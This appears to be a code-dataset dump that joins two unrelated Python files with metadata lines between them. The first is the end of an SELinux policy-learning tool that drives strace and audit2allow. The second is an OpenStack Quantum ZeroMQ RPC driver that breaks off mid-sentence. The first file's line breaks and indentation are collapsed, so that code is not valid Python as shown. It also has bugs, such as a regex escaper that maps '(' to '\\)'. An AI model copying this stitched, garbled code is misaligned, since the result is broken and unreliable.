proc.communicate() if proc.returncode != 0: print("Error while auditing:\n<stdout>%s</stdout>\n<stderr>%s</stderr>" % (stdout, stderr), file=sys.stderr) return rules lines=stdout.splitlines() log(2, "audit2allow output (%i lines) is: '%s'" % (len(lines), stdout)) store=False for line in lines: line = line.decode() log(2, "line[:10] = '%s'" % (line[:10])) if line[:10] == "#=========": fields=line.split(" ") if fields[1] == domain_t: store = True else: store = False else: if store and len(line)>0: rules.append(line); return rules def regeneratePolicy(policy_path, rules, permissive_domains = list()): # Add the lines to the policy template_te = open(policy_path, "a"); #template_te.writelines(rules) for line in rules: template_te.write(line+"\n") template_te.close() # Parse it scanner = SELinuxScanner() parser = SELinuxParser(scanner) te_file = open(policy_path, "r") tokens = parser.parse(te_file.read()) te_file.close() # Store it optimized optimizer = SELinuxOptimizer(tokens) optimizer.selfize_rules() optimizer.factorize_rules() optimizer.factorize_rule_attributes() optimizer.sort_rules() optimizer.to_file(policy_path, permissive_domains) def updateAndReloadRules(module_name, module_domain_t, enforcingMode = True, forceReload=False): log(1, "Read the audit2allow output") rules = getAudit2AllowRules(module_domain_t) if forceReload or len(rules) > 0: log(0, "Add %i rules to %s and reload the policy" % (len(rules), getPolicyPath(module_name, "te"))) if not enforcingMode: permissive_domains = [module_domain_t] else: permissive_domains = list() regeneratePolicy(getPolicyPath(module_name, "te"), rules, permissive_domains) # empty the logs dmesg = subprocess.Popen([dmesg_path, '-c'], stdout=subprocess.PIPE, stderr=subprocess.PIPE) dmesg.communicate() # Load the new policy compileAndLoadSELinuxModule(getPolicyPath(module_name, "")) return len(rules) def runApp(module_name, app_path, useStrace=False): if useStrace and os.path.exists(strace_path): print("Launch the application and trace it with strace") proc = subprocess.Popen([strace_path, '-e' 'trace=open,execve,mkdir', '-o', "%sstrace" % getTempModuleTransitionPath("selpolgen-%s" % module_name, ""), '-ff', '-F', app_path]) else: print("Launch the application") proc = subprocess.Popen([app_path]) # get the pid curPID = proc.pid return proc def askToRunApp(app_path, domain_t, audit_fc=False): deleteFileList(["/tmp/selinux-audit"]) print("\n****** Entering the auditing loop ******") if audit_fc: print("The application you are auditing will first be launched in a permissive mode, be sure to use all the functionnalities before quitting it.\n") print("Please launch this command in the domain %s: %s" % (domain_t, "selaudit_user.sh %s" % app_path)) def getFileCon(filepath): proc = subprocess.Popen([ls_path, '-Z', filepath], stdout=subprocess.PIPE, stderr=subprocess.PIPE) stdout,stderr = proc.communicate() if proc.returncode != 0: # print("Error while getting the context of the file '%s':\n<stdout>%s</stdout>\n<stderr>%s</stderr>" % (filepath, stdout, stderr), file=sys.stderr) return "<Context not found>" fields = str(stdout, "utf-8").split(' ') log(2, "getFileCon('%s') = '%s'" % (filepath, fields[0])) return fields[0] def deleteFileList(to_be_deleted): for f in to_be_deleted: try: if os.path.isfile(f) or os.path.islink(f): os.remove(f) elif os.path.isdir(f): shutil.rmtree(f) except Exception as inst: print("deleteFileList: Caught exception %s: %s" % (type(inst), inst)) pass def escape_re(re): re = re.replace(".", "\\."); re = re.replace("(", "\\)"); re = 
re.replace(")", "\\)"); re = re.replace("|", "\\|"); re = re.replace("^", "\\^"); re = re.replace("*", "\\*"); re = re.replace("+", "\\+"); re = re.replace("?", "\\?"); return re def auditStraceLogs(module_name, dir_path="/tmp/selinux-audit/", saveResults=True): # dir_path = getTempModuleTransitionPath("selpolgen-%s" % module_name, "") execves = dict() mkdirs = dict() opens = dict() libs = dict() shms = dict() failed = list() to_be_deleted = list() # Read all the logs log_files = glob.glob("%s/strace*" % dir_path) for log in log_files: f = open(log, "r") for line in f: m = re.match(r"(?P<function>\w+) *\((?P<params>.*)\) *= *(?P<result>.*)", line) if m: args = m.group('params').split(', ') if not m.group('result').startswith("-1"): line = "%s(%s)" % (m.group('function'), ','.join(args)) m2 = re.match(r"\"(.*)\"", args[0]) if m2: filepath = m2.group(1) if m.group('function') == "open": if args[1].find('O_CREAT') != -1 or args[1].find('O_WRONLY') != -1: to_be_deleted.append(filepath) # Is the file a standard library ? stdlib = re.match(r"/(usr/)?lib/[^/]+", filepath) if filepath.startswith('/dev/shm'): if filepath not in shms: shms[filepath] = list() if line not in shms[filepath]: shms[filepath].append(line) elif stdlib: if filepath not in opens: libs[filepath] = list() if line not in libs[filepath]: libs[filepath].append(line) else: if filepath not in opens: opens[filepath] = list() if line not in opens[filepath]: opens[filepath].append(line) elif m.group('function') == "mkdir": if filepath not in mkdirs: mkdirs[filepath] = list() if line not in mkdirs[filepath]: mkdirs[filepath].append(line) to_be_deleted.append(filepath) elif m.group('function') == "execve": if filepath not in execves: execves[filepath] = list() if line not in execves[filepath]: execves[filepath].append(line) else: line = "%s(%s)" % (m.group('function'), ','.join(args)) f.close() # Delete all the strace files deleteFileList(log_files); if saveResults: # We have the logs, sorted by type and by path, generate the output file fc_file = open(getPolicyPath(module_name, "fc"), "a") fc_file.write("\n\n\n# **** Mkdir ****\n") mkdir_keys = mkdirs.keys() for dir_path in sorted(mkdir_keys): # Write all the interactions with this file for call in mkdirs[dir_path]: fc_file.write("# %s\n" % call) # Propose a rule fc_file.write("#%s/(.*/)? 
%s\n\n" % (escape_re(dir_path), getFileCon(dir_path))) fc_file.write("\n\n\n# **** Execve ****\n") execve_keys = execves.keys() for exe_path in sorted(execve_keys): # Write all the interactions with this file for call in execves[exe_path]: fc_file.write("# %s\n" % call) # Propose a rule fc_file.write("#%s -- %s\n\n" % (escape_re(exe_path), getFileCon(exe_path))) fc_file.write("\n\n\n# **** Open ****\n") open_keys = opens.keys() for open_path in sorted(open_keys): # Write all the interactions with this file for call in opens[open_path]: fc_file.write("# %s\n" % call) # Propose a rule fc_file.write("#%s -- %s\n\n" % (escape_re(open_path), getFileCon(open_path))) fc_file.write("\n\n\n# **** Standard libraries ****\n") libs_keys = libs.keys() for lib_path in sorted(libs_keys): # Write all the interactions with this file for call in libs[lib_path]: fc_file.write("# %s\n" % call) # Propose a rule fc_file.write("#%s -- %s\n\n" % (escape_re(lib_path), getFileCon(lib_path))) fc_file.write("\n\n\n# **** SHM ****\n") shms_keys = shms.keys() for shm_path in sorted(shms_keys): # Write all the interactions with this file for call in shms[shm_path]: fc_file.write("# %s\n" % call) # Propose a rule fc_file.write("#%s -- %s\n\n" % (escape_re(shm_path), getFileCon(shm_path))) # Delete all the created files deleteFileList(to_be_deleted); def parseFCFile(policy_fc): # Read the fc policy if not os.path.exists(policy_fc): return set(), "The fc policy file %s doesn't exist\n" % policy_fc fc_policy_file = open("%s" % policy_fc, "r") # split the fc policy file fc_policies = [] for line in fc_policy_file: m = re.match(r"\s*(?P<comment>#)?(?P<path>\\?/\S+)\s+(?P<type>\S+)?\s+(?P<context>\S+)", line) if m: pol = dict() pol['path'] = m.groupdict()['path'] pol['type'] = m.groupdict()['type'] pol['context'] = m.groupdict()['context'] pol['commented'] = m.groupdict()['comment']=="#" if (pol['type'] == None): pol['type'] = '' #print("Found rule: comment = '%s' path='%s', type='%s', context='%s'" % (pol['commented'], pol['path'], pol['type'], pol['context'])) fc_policies.append(pol) return fc_policies def addFCContextsToTE(policy_fc, policy_te): # Read the te policy if not os.path.exists(policy_te): return set(), "The te policy file %s doesn't exist\n" % policy_fc te_policy_file = open("%s" % policy_te, "a") fc_policies = parseFCFile(policy_fc) for policy in fc_policies: if not policy['commented']: print("got context %s\n" % policy['context']) te_policy_file.write("type %s;\nfiles_type(%s);\n" % (policy['context'], policy['context'])) te_policy_file.close() def editFiles(filepathes): editor_path = os.getenv('EDITOR') if not editor_path: print('The $EDITOR environement variable is not set.\nWhich editor would you like to use ?') editor = input('') os.environ['EDITOR'] = editor params = [editor_path] params.extend(filepathes) proc = subprocess.Popen(params) proc.communicate() return proc.returncode == 0 def willingToQuit(): print("\nThe system is currently learning a SELinux security policy.") print("Deciding to stop it now means you have successfully tested all the functionnalities of the software you are auditing.") print("\nAre you sure you want to stop it ? 
(y/N)") answer=input('') if answer in ('y', 'Y', 'Yes', 'yes'): return True else: return False def startAuditing(module_name, app_path, module_domain_t, module_tmp_domain_t, module_log_domain_t, module_exec_t, user_u, user_r, user_t, audit_fc, reuse): # Re-route signals to the launched process signal.signal(signal.SIGINT, handler) signal.signal(signal.SIGTERM, handler) signal.signal(signal.SIGHUP, handler) global wantToAbort wantToAbort = False if not reuse: # Get a base policy and load it print("Generate the base policy and load it") base_policy=generateBasePolicy(module_name, app_path, module_domain_t, module_tmp_domain_t, module_log_domain_t, module_exec_t, user_u, user_r, user_t, audit_fc) if not compileAndLoadSELinuxModule(base_policy): return False else: if not os.path.exists(getPolicyPath(module_name, "te")): print("The module %s doesn't exist." % module_name) return # Create a policy for selpolgen.py so as when it launches the audited program, the audited program will transit to the right domain print("Generate the sysadm policy to launch the application in the right context") temp_policy=generateAuditPolicy(module_name, app_path, module_domain_t, module_exec_t, user_u, user_r, user_t) if not compileAndLoadSELinuxModule(temp_policy): return False # Set the app context on the disc print("Set the application file's new context") setFileSELinuxContext("system_u", "object_r", module_exec_t, app_path) # run the application askToRunApp(app_path, user_t, audit_fc); if audit_fc: isRunning = True while isRunning : if wantToAbort: if willingToQuit(): sys.exit(0) else: wantToAbort = False time.sleep(0.1) # remove the lock if the file exists if os.path.exists("/tmp/selinux-audit/lock"): isRunning = False # Propose some file constraints print("Update the fc file, this may take a while"); auditStraceLogs(module_name) # Regenerate the policy updateAndReloadRules(module_name, module_domain_t, enforcingMode = True, forceReload=True) # let the application start again os.remove("/tmp/selinux-audit/lock") print("FC Labelling done\n") print("Start the TE learning loop") # learning loop nbRulesAddedSinceLastExecution = 0 execStart = time.time() zeroRuleLoopCount = 0 while True: if wantToAbort: if willingToQuit(): break else: wantToAbort = False time.sleep(0.1) nbRulesAddedSinceLastExecution += updateAndReloadRules(module_name, module_domain_t) # remove the lock if the file exists if os.path.exists("/tmp/selinux-audit/lock"): if nbRulesAddedSinceLastExecution > 0: auditStraceLogs(module_name, dir_path="/tmp/selinux-audit/", saveResults=False) zeroRuleLoopCount = 0 elif time.time()-execStart > 2.0 or zeroRuleLoopCount > 5: print("\n**********\nNo rules have been added during the execution of this audit instance.") print("Have you tested every use case allowed for the application ? 
(y/N)") answer=input('') print("**********") if answer in ('y', 'Y', 'Yes', 'yes'): break zeroRuleLoopCount = 0 else: zeroRuleLoopCount = zeroRuleLoopCount + 1 print("The instance didn't generate any rules but carry on nevertheless (%s/5)" % zeroRuleLoopCount) nbRulesAddedSinceLastExecution = 0 execStart = time.time() os.remove("/tmp/selinux-audit/lock"); print("\nThe final policy can be found at %s" % getPolicyPath(module_name, "")) class Usage(Exception): def __init__(self, msg): Exception.__init__(self) self.msg = msg def show_help(): print("Help:\n") print("-h or --help : This help message") print("-m or --module : The name of the SELinux module you would like to create (mandatory)") print("-u or --user_u : The SELinux user who will execute the application") print("-r or --user_r : The SELinux role who will execute the application") print("-t or --user_t : The SELinux type who will execute the application") print("-d or --module_domain_t : The domain in which the audited application will be executed") print("-e or --module_exec_t : The file label that will be given to the application") print("-t or --module_tmp_domain_t : The file label that will be given to the application's tmp files") print("-l or --module_log_domain_t : The file label that will be given to the application's log files") print("-f or --no_fc_pass : Do not fill the fc file. Learning the policy will take one iteration less") print("-p or --reuse_policy : Re-use a pre-existing policy and learn what's new") def main(argv=None): if argv is None: argv = sys.argv cwd = os.path.dirname(os.path.realpath(argv[0])) + '/' os.chdir(cwd) try: # Check the given parameter names and get their values try: opts, args = getopt.getopt(argv[1:], "hvm:u:r:t:d:e:t:l:fp", ["help", "verbose", "module=", "user_u=", "user_r=", "user_t=", "module_domain_t=", "module_exec_t=", "module_tmp_domain_t=", "module_log_domain_t=", "no_fc_pass", "reuse_policy"]) except(getopt.error) as msg: print("Argument parsing error: %s" % msg) raise Usage(msg) # Params module_name = '' module_domain_t = '' module_exec_t = '' module_tmp_domain_t = '' module_log_domain_t = '' audit_fc = True app_fullpath = '' user_u = user_u_default user_r = user_r_default user_t = user_t_default reuse = False # Get the parameters for opt, arg in opts: if opt in ("-h", "--help"): show_help() return 0 elif opt in ("-v", "--verbose"): verbosity += 1 elif opt in ("-m", "--module"): module_name = arg elif opt in ("-u", "--user_u"): user_u = arg elif opt in ("-r", "--user_r"): user_r = arg elif opt in ("-t", "--user_t"): user_t = arg elif opt in ("-e", "--module_exec_t"): module_exec_t = arg elif opt in ("-d", "--module_domain_t"): module_domain_t = arg elif opt in ("-t", "--module_tmp_domain_t"): module_tmp_domain_t = arg elif opt in ("-l", "--module_log_domain_t"): module_log_domain_t = arg elif opt in ("-f", "--no_fc_pass"): audit_fc = False elif opt in ("-p", "--reuse_policy"): reuse = True # if there are no args left, then an error happened if len(args) == 0 or module_name == '': print('Usage: %s [options] -m module_name filepath' % sys.argv[0], file=sys.stderr) else: # Get the fullpath app_fullpath = args[len(args)-1] # Set the default value for module_domain_t & module_exec_t if there were not set by the user if module_domain_t == '': module_domain_t = module_domain_t_default_pattern.replace("%modulename%", module_name) if module_exec_t == '': module_exec_t = module_exec_t_default_pattern.replace("%modulename%", module_name) if module_tmp_domain_t == '': module_tmp_domain_t = 
module_tmp_domain_t_default_pattern.replace("%modulename%", module_name) if module_log_domain_t == '': module_log_domain_t = module_log_domain_t_default_pattern.replace("%modulename%", module_name) # Let's recap to the user what he has chosen. print('You are about to create a SELinux module for the application') print('') print('Here is the summary of how it will be created:') print(' Module name (-m): %s' % module_name) print(' Application path: \'%s\'' % app_fullpath) print(' Will be labelled as ():():(-e):%s:%s:%s' % ('system_u', 'object_r', module_exec_t)) print(' Be executed by (-u):(-r):(-t): %s:%s:%s' % (user_u, user_r, user_t)) print(' Jailed in the domain (-d): %s' % module_domain_t) print(' Tmp file\'s domain is (-t): %s' % module_tmp_domain_t) print(' Log file\'s domain is (-l): %s' % module_log_domain_t) print(' Do not audit the fc file (bad practice!) (-f): %s' % (not audit_fc)) print(' Re-use an existing policy (-p): %s' % (reuse)) print('') print('Do you agree with that ? (Y/n)') answer=input('') if answer in ('', 'y', 'Y', 'Yes', 'yes'): startAuditing(module_name, app_fullpath, module_domain_t, module_tmp_domain_t, module_log_domain_t, module_exec_t, user_u, user_r, user_t, audit_fc, reuse) else: return 0 except(Usage) as err: print('%s: %s' % (sys.argv[0], err.msg), file=sys.stderr) print('For a list of available options, use "%s --help"'\ % sys.argv[0], file=sys.stderr) return -1 if __name__ == '__main__': main()
gpl-3.0
-7,108,910,309,036,765,000
32.52431
267
0.65428
false
2.978286
false
false
false
rossella/neutron
quantum/openstack/common/rpc/impl_zmq.py
1
25519
# vim: tabstop=4 shiftwidth=4 softtabstop=4 # Copyright 2011 Cloudscaling Group, Inc # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. import os import pprint import socket import string import sys import types import uuid import eventlet import greenlet from quantum.openstack.common import cfg from quantum.openstack.common.gettextutils import _ from quantum.openstack.common import importutils from quantum.openstack.common import jsonutils from quantum.openstack.common import processutils as utils from quantum.openstack.common.rpc import common as rpc_common zmq = importutils.try_import('eventlet.green.zmq') # for convenience, are not modified. pformat = pprint.pformat Timeout = eventlet.timeout.Timeout LOG = rpc_common.LOG RemoteError = rpc_common.RemoteError RPCException = rpc_common.RPCException zmq_opts = [ cfg.StrOpt('rpc_zmq_bind_address', default='*', help='ZeroMQ bind address. Should be a wildcard (*), ' 'an ethernet interface, or IP. ' 'The "host" option should point or resolve to this ' 'address.'), # The module.Class to use for matchmaking. cfg.StrOpt( 'rpc_zmq_matchmaker', default=('quantum.openstack.common.rpc.' 'matchmaker.MatchMakerLocalhost'), help='MatchMaker driver', ), # The following port is unassigned by IANA as of 2012-05-21 cfg.IntOpt('rpc_zmq_port', default=9501, help='ZeroMQ receiver listening port'), cfg.IntOpt('rpc_zmq_contexts', default=1, help='Number of ZeroMQ contexts, defaults to 1'), cfg.IntOpt('rpc_zmq_topic_backlog', default=None, help='Maximum number of ingress messages to locally buffer ' 'per topic. Default is unlimited.'), cfg.StrOpt('rpc_zmq_ipc_dir', default='/var/run/openstack', help='Directory for holding IPC sockets'), cfg.StrOpt('rpc_zmq_host', default=socket.gethostname(), help='Name of this node. Must be a valid hostname, FQDN, or ' 'IP address. Must match "host" option, if running Nova.') ] CONF = cfg.CONF CONF.register_opts(zmq_opts) ZMQ_CTX = None # ZeroMQ Context, must be global. matchmaker = None # memoized matchmaker object def _serialize(data): """ Serialization wrapper We prefer using JSON, but it cannot encode all types. Error if a developer passes us bad data. """ try: return str(jsonutils.dumps(data, ensure_ascii=True)) except TypeError: LOG.error(_("JSON serialization failed.")) raise def _deserialize(data): """ Deserialization wrapper """ LOG.debug(_("Deserializing: %s"), data) return jsonutils.loads(data) class ZmqSocket(object): """ A tiny wrapper around ZeroMQ to simplify the send/recv protocol and connection management. Can be used as a Context (supports the 'with' statement). """ def __init__(self, addr, zmq_type, bind=True, subscribe=None): self.sock = _get_ctxt().socket(zmq_type) self.addr = addr self.type = zmq_type self.subscriptions = [] # Support failures on sending/receiving on wrong socket type. 
self.can_recv = zmq_type in (zmq.PULL, zmq.SUB) self.can_send = zmq_type in (zmq.PUSH, zmq.PUB) self.can_sub = zmq_type in (zmq.SUB, ) # Support list, str, & None for subscribe arg (cast to list) do_sub = { list: subscribe, str: [subscribe], type(None): [] }[type(subscribe)] for f in do_sub: self.subscribe(f) str_data = {'addr': addr, 'type': self.socket_s(), 'subscribe': subscribe, 'bind': bind} LOG.debug(_("Connecting to %(addr)s with %(type)s"), str_data) LOG.debug(_("-> Subscribed to %(subscribe)s"), str_data) LOG.debug(_("-> bind: %(bind)s"), str_data) try: if bind: self.sock.bind(addr) else: self.sock.connect(addr) except Exception: raise RPCException(_("Could not open socket.")) def socket_s(self): """Get socket type as string.""" t_enum = ('PUSH', 'PULL', 'PUB', 'SUB', 'REP', 'REQ', 'ROUTER', 'DEALER') return dict(map(lambda t: (getattr(zmq, t), t), t_enum))[self.type] def subscribe(self, msg_filter): """Subscribe.""" if not self.can_sub: raise RPCException("Cannot subscribe on this socket.") LOG.debug(_("Subscribing to %s"), msg_filter) try: self.sock.setsockopt(zmq.SUBSCRIBE, msg_filter) except Exception: return self.subscriptions.append(msg_filter) def unsubscribe(self, msg_filter): """Unsubscribe.""" if msg_filter not in self.subscriptions: return self.sock.setsockopt(zmq.UNSUBSCRIBE, msg_filter) self.subscriptions.remove(msg_filter) def close(self): if self.sock is None or self.sock.closed: return # We must unsubscribe, or we'll leak descriptors. if len(self.subscriptions) > 0: for f in self.subscriptions: try: self.sock.setsockopt(zmq.UNSUBSCRIBE, f) except Exception: pass self.subscriptions = [] try: # Default is to linger self.sock.close() except Exception: # While this is a bad thing to happen, # it would be much worse if some of the code calling this # were to fail. For now, lets log, and later evaluate # if we can safely raise here. 
LOG.error("ZeroMQ socket could not be closed.") self.sock = None def recv(self): if not self.can_recv: raise RPCException(_("You cannot recv on this socket.")) return self.sock.recv_multipart() def send(self, data): if not self.can_send: raise RPCException(_("You cannot send on this socket.")) self.sock.send_multipart(data) class ZmqClient(object): """Client for ZMQ sockets.""" def __init__(self, addr, socket_type=None, bind=False): if socket_type is None: socket_type = zmq.PUSH self.outq = ZmqSocket(addr, socket_type, bind=bind) def cast(self, msg_id, topic, data, serialize=True, force_envelope=False): if serialize: data = rpc_common.serialize_msg(data, force_envelope) self.outq.send([str(msg_id), str(topic), str('cast'), _serialize(data)]) def close(self): self.outq.close() class RpcContext(rpc_common.CommonRpcContext): """Context that supports replying to a rpc.call.""" def __init__(self, **kwargs): self.replies = [] super(RpcContext, self).__init__(**kwargs) def deepcopy(self): values = self.to_dict() values['replies'] = self.replies return self.__class__(**values) def reply(self, reply=None, failure=None, ending=False): if ending: return self.replies.append(reply) @classmethod def marshal(self, ctx): ctx_data = ctx.to_dict() return _serialize(ctx_data) @classmethod def unmarshal(self, data): return RpcContext.from_dict(_deserialize(data)) class InternalContext(object): """Used by ConsumerBase as a private context for - methods.""" def __init__(self, proxy): self.proxy = proxy self.msg_waiter = None def _get_response(self, ctx, proxy, topic, data): """Process a curried message and cast the result to topic.""" LOG.debug(_("Running func with context: %s"), ctx.to_dict()) data.setdefault('version', None) data.setdefault('args', {}) try: result = proxy.dispatch( ctx, data['version'], data['method'], **data['args']) return ConsumerBase.normalize_reply(result, ctx.replies) except greenlet.GreenletExit: # ignore these since they are just from shutdowns pass except rpc_common.ClientException, e: LOG.debug(_("Expected exception during message handling (%s)") % e._exc_info[1]) return {'exc': rpc_common.serialize_remote_exception(e._exc_info, log_failure=False)} except Exception: LOG.error(_("Exception during message handling")) return {'exc': rpc_common.serialize_remote_exception(sys.exc_info())} def reply(self, ctx, proxy, msg_id=None, context=None, topic=None, msg=None): """Reply to a casted call.""" # Our real method is curried into msg['args'] child_ctx = RpcContext.unmarshal(msg[0]) response = ConsumerBase.normalize_reply( self._get_response(child_ctx, proxy, topic, msg[1]), ctx.replies) LOG.debug(_("Sending reply")) cast(CONF, ctx, topic, { 'method': '-process_reply', 'args': { 'msg_id': msg_id, 'response': response } }) class ConsumerBase(object): """Base Consumer.""" def __init__(self): self.private_ctx = InternalContext(None) @classmethod def normalize_reply(self, result, replies): #TODO(ewindisch): re-evaluate and document this method. if isinstance(result, types.GeneratorType): return list(result) elif replies: return replies else: return [result] def process(self, style, target, proxy, ctx, data): # Method starting with - are # processed internally. (non-valid method name) method = data['method'] # Internal method # uses internal context for safety. 
if data['method'][0] == '-': # For reply / process_reply method = method[1:] if method == 'reply': self.private_ctx.reply(ctx, proxy, **data['args']) return data.setdefault('version', None) data.setdefault('args', {}) proxy.dispatch(ctx, data['version'], data['method'], **data['args']) class ZmqBaseReactor(ConsumerBase): """ A consumer class implementing a centralized casting broker (PULL-PUSH) for RoundRobin requests. """ def __init__(self, conf): super(ZmqBaseReactor, self).__init__() self.mapping = {} self.proxies = {} self.threads = [] self.sockets = [] self.subscribe = {} self.pool = eventlet.greenpool.GreenPool(conf.rpc_thread_pool_size) def register(self, proxy, in_addr, zmq_type_in, out_addr=None, zmq_type_out=None, in_bind=True, out_bind=True, subscribe=None): LOG.info(_("Registering reactor")) if zmq_type_in not in (zmq.PULL, zmq.SUB): raise RPCException("Bad input socktype") # Items push in. inq = ZmqSocket(in_addr, zmq_type_in, bind=in_bind, subscribe=subscribe) self.proxies[inq] = proxy self.sockets.append(inq) LOG.info(_("In reactor registered")) if not out_addr: return if zmq_type_out not in (zmq.PUSH, zmq.PUB): raise RPCException("Bad output socktype") # Items push out. outq = ZmqSocket(out_addr, zmq_type_out, bind=out_bind) self.mapping[inq] = outq self.mapping[outq] = inq self.sockets.append(outq) LOG.info(_("Out reactor registered")) def consume_in_thread(self): def _consume(sock): LOG.info(_("Consuming socket")) while True: self.consume(sock) for k in self.proxies.keys(): self.threads.append( self.pool.spawn(_consume, k) ) def wait(self): for t in self.threads: t.wait() def close(self): for s in self.sockets: s.close() for t in self.threads: t.kill() class ZmqProxy(ZmqBaseReactor): """ A consumer class implementing a topic-based proxy, forwarding to IPC sockets. """ def __init__(self, conf): super(ZmqProxy, self).__init__(conf) self.topic_proxy = {} def consume(self, sock): ipc_dir = CONF.rpc_zmq_ipc_dir #TODO(ewindisch): use zero-copy (i.e. references, not copying) data = sock.recv() msg_id, topic, style, in_msg = data topic = topic.split('.', 1)[0] LOG.debug(_("CONSUMER GOT %s"), ' '.join(map(pformat, data))) # Handle zmq_replies magic if topic.startswith('fanout~'): sock_type = zmq.PUB elif topic.startswith('zmq_replies'): sock_type = zmq.PUB inside = rpc_common.deserialize_msg(_deserialize(in_msg)) msg_id = inside[-1]['args']['msg_id'] response = inside[-1]['args']['response'] LOG.debug(_("->response->%s"), response) data = [str(msg_id), _serialize(response)] else: sock_type = zmq.PUSH if not topic in self.topic_proxy: def publisher(waiter): LOG.info(_("Creating proxy for topic: %s"), topic) try: out_sock = ZmqSocket("ipc://%s/zmq_topic_%s" % (ipc_dir, topic), sock_type, bind=True) except RPCException: waiter.send_exception(*sys.exc_info()) return self.topic_proxy[topic] = eventlet.queue.LightQueue( CONF.rpc_zmq_topic_backlog) self.sockets.append(out_sock) # It takes some time for a pub socket to open, # before we can have any faith in doing a send() to it. 
if sock_type == zmq.PUB: eventlet.sleep(.5) waiter.send(True) while(True): data = self.topic_proxy[topic].get() out_sock.send(data) LOG.debug(_("ROUTER RELAY-OUT SUCCEEDED %(data)s") % {'data': data}) wait_sock_creation = eventlet.event.Event() eventlet.spawn(publisher, wait_sock_creation) try: wait_sock_creation.wait() except RPCException: LOG.error(_("Topic socket file creation failed.")) return try: self.topic_proxy[topic].put_nowait(data) LOG.debug(_("ROUTER RELAY-OUT QUEUED %(data)s") % {'data': data}) except eventlet.queue.Full: LOG.error(_("Local per-topic backlog buffer full for topic " "%(topic)s. Dropping message.") % {'topic': topic}) def consume_in_thread(self): """Runs the ZmqProxy service""" ipc_dir = CONF.rpc_zmq_ipc_dir consume_in = "tcp://%s:%s" % \ (CONF.rpc_zmq_bind_address, CONF.rpc_zmq_port) consumption_proxy = InternalContext(None) if not os.path.isdir(ipc_dir): try: utils.execute('mkdir', '-p', ipc_dir, run_as_root=True) utils.execute('chown', "%s:%s" % (os.getuid(), os.getgid()), ipc_dir, run_as_root=True) utils.execute('chmod', '750', ipc_dir, run_as_root=True) except utils.ProcessExecutionError: LOG.error(_("Could not create IPC directory %s") % (ipc_dir, )) raise try: self.register(consumption_proxy, consume_in, zmq.PULL, out_bind=True) except zmq.ZMQError: LOG.error(_("Could not create ZeroMQ receiver daemon. " "Socket may already be in use.")) raise super(ZmqProxy, self).consume_in_thread() class ZmqReactor(ZmqBaseReactor): """ A consumer class implementing a consumer for messages. Can also be used as a 1:1 proxy """ def __init__(self, conf): super(ZmqReactor, self).__init__(conf) def consume(self, sock): #TODO(ewindisch): use zero-copy (i.e. references, not copying) data = sock.recv() LOG.debug(_("CONSUMER RECEIVED DATA: %s"), data) if sock in self.mapping: LOG.debug(_("ROUTER RELAY-OUT %(data)s") % { 'data': data}) self.mapping[sock].send(data) return msg_id, topic, style, in_msg = data ctx, request = rpc_common.deserialize_msg(_deserialize(in_msg)) ctx = RpcContext.unmarshal(ctx) proxy = self.proxies[sock] self.pool.spawn_n(self.process, style, topic, proxy, ctx, request) class Connection(rpc_common.Connection): """Manages connections and threads.""" def __init__(self, conf): self.reactor = ZmqReactor(conf) def create_consumer(self, topic, proxy, fanout=False): # Only consume on the base topic name. topic = topic.split('.', 1)[0] LOG.info(_("Create Consumer for topic (%(topic)s)") % {'topic': topic}) # Subscription scenarios if fanout: subscribe = ('', fanout)[type(fanout) == str] sock_type = zmq.SUB topic = 'fanout~' + topic else: sock_type = zmq.PULL subscribe = None # Receive messages from (local) proxy inaddr = "ipc://%s/zmq_topic_%s" % \ (CONF.rpc_zmq_ipc_dir, topic) LOG.debug(_("Consumer is a zmq.%s"), ['PULL', 'SUB'][sock_type == zmq.SUB]) self.reactor.register(proxy, inaddr, sock_type, subscribe=subscribe, in_bind=False) def close(self): self.reactor.close() def wait(self): self.reactor.wait() def consume_in_thread(self): self.reactor.consume_in_thread() def _cast(addr, context, msg_id, topic, msg, timeout=None, serialize=True, force_envelope=False): timeout_cast = timeout or CONF.rpc_cast_timeout payload = [RpcContext.marshal(context), msg] with Timeout(timeout_cast, exception=rpc_common.Timeout): try: conn = ZmqClient(addr) # assumes cast can't return an exception conn.cast(msg_id, topic, payload, serialize, force_envelope) except zmq.ZMQError: raise RPCException("Cast failed. 
ZMQ Socket Exception") finally: if 'conn' in vars(): conn.close() def _call(addr, context, msg_id, topic, msg, timeout=None, serialize=True, force_envelope=False): # timeout_response is how long we wait for a response timeout = timeout or CONF.rpc_response_timeout # The msg_id is used to track replies. msg_id = uuid.uuid4().hex # Replies always come into the reply service. reply_topic = "zmq_replies.%s" % CONF.rpc_zmq_host LOG.debug(_("Creating payload")) # Curry the original request into a reply method. mcontext = RpcContext.marshal(context) payload = { 'method': '-reply', 'args': { 'msg_id': msg_id, 'context': mcontext, 'topic': reply_topic, 'msg': [mcontext, msg] } } LOG.debug(_("Creating queue socket for reply waiter")) # Messages arriving async. # TODO(ewindisch): have reply consumer with dynamic subscription mgmt with Timeout(timeout, exception=rpc_common.Timeout): try: msg_waiter = ZmqSocket( "ipc://%s/zmq_topic_zmq_replies" % CONF.rpc_zmq_ipc_dir, zmq.SUB, subscribe=msg_id, bind=False ) LOG.debug(_("Sending cast")) _cast(addr, context, msg_id, topic, payload, serialize=serialize, force_envelope=force_envelope) LOG.debug(_("Cast sent; Waiting reply")) # Blocks until receives reply msg = msg_waiter.recv() LOG.debug(_("Received message: %s"), msg) LOG.debug(_("Unpacking response")) responses = _deserialize(msg[-1]) # ZMQError trumps the Timeout error. except zmq.ZMQError: raise RPCException("ZMQ Socket Error") finally: if 'msg_waiter' in vars(): msg_waiter.close() # It seems we don't need to do all of the following, # but perhaps it would be useful for multicall? # One effect of this is that we're checking all # responses for Exceptions. for resp in responses: if isinstance(resp, types.DictType) and 'exc' in resp: raise rpc_common.deserialize_remote_exception(CONF, resp['exc']) return responses[-1] def _multi_send(method, context, topic, msg, timeout=None, serialize=True, force_envelope=False): """ Wraps the sending of messages, dispatches to the matchmaker and sends message to all relevant hosts. """ conf = CONF LOG.debug(_("%(msg)s") % {'msg': ' '.join(map(pformat, (topic, msg)))}) queues = _get_matchmaker().queues(topic) LOG.debug(_("Sending message(s) to: %s"), queues) # Don't stack if we have no matchmaker results if len(queues) == 0: LOG.warn(_("No matchmaker results. Not casting.")) # While not strictly a timeout, callers know how to handle # this exception and 